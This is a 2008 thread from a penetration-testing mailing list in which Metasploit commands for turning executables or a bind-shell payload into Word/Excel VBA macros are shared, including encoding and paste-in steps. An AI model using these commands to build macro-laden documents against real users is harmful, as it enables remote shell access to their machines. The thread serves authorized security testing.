Re: Exe2vba - Anybody still have this?

[infolookup () gmail com]

Pretty nice stuff I never figured this feature was in there.
------Original Message------
From: H D Moore
Sender: listbounce () securityfocus com
To: pen-test () securityfocus com
Cc: Joseph McCray
Sent: Nov 12, 2008 2:21 PM
Subject: Re: Exe2vba - Anybody still have this?

Hi Joseph,

I added this to Metasploit. You can use the VBA generator in a few 
different ways:

1) Convert an EXE to a VBA script (works on Word/Excel automatically):

$ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba

2) Create a VBA script that runs a Metasploit payload

$  ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba

3) Create a VBA script that runs an encoded Metasploit payload

$  ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
    ruby msf3/msfencode -a x86 -b '' -t vba   > output.vba

To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual 
Basic Editor, paste in, save, and exit. Works pretty well here :-)

You need the latest SVN of Metasploit 3.2 trunk:
 $ svn co http://metasploit.com/svn/framework3/trunk/

On Windows, follow this guide:
 - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN

-HD

On Tuesday 11 November 2008, Joseph McCray wrote:
> It used to be located at:
> http://www.priestmaster.org/tools.html
>
> I've been looking all over the web and really haven't been able to find
> this app anymore.


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------



Sent from my Verizon Wireless BlackBerry